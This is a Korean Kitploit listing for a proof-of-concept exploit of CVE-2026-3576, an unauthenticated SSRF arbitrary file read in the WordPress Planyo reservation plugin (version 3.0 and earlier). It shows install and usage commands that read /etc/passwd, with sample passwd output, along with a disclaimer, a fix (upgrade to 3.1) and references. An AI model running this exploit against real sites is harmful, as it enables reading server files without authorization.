Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-3576 — CVE-2026-3576에 대한 개념 증명 익스플로잇 | Kitploit
도구/GitHubGitHub/anirbala98/cve-2026-3576
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

CVE-2026-3576에 대한 개념 증명 익스플로잇

저장소 보기
211311일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-3576 - WordPress 플러그인 Planyo Online Reservation System <= 3.0 - SSRF를 통한 임의 파일 읽기

이 저장소는 CVE-2026-3576에 대한 Python 기반 PoC(Proof of Concept) 익스플로잇을 포함하고 있습니다. Exploit-DB에서도 확인할 수 있습니다 여기.

또한 이 익스플로잇에 대한 Metasploit 모듈도 개발했으며, 여기에서 확인할 수 있습니다.

면책 조항

이 프로젝트는 교육 목적과 승인된 보안 테스트를 위해서만 제공됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 사용하지 마십시오.

개요

WordPress의 Planyo Online Reservation System 플러그인 버전 3.1 이전에는 SSRF(Server Side Request Forgery) 취약점이 존재합니다. 이 취약점으로 인해 인증되지 않은 공격자가 ulap_url 매개변수를 통해 file://URL을 제공하여 임의 파일에 접근할 수 있습니다.

소스 코드 분석과 익스플로잇 시연이 포함된 상세한 분석 글은 제 Medium 블로그에서 확인할 수 있습니다.

영향을 받는 버전

구성 요소버전
취약한 플러그인<=3.0
패치된 플러그인3.1

요구 사항

  • Python 3.13.14
  • Requests 2.32.5

설치

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

사용법

root@kitploit:~
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

예시

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable

[*] Attempting to read arbitrary file...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

완화 조치

플러그인을 버전 3.1로 업그레이드하십시오.

참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3
도구 다운로드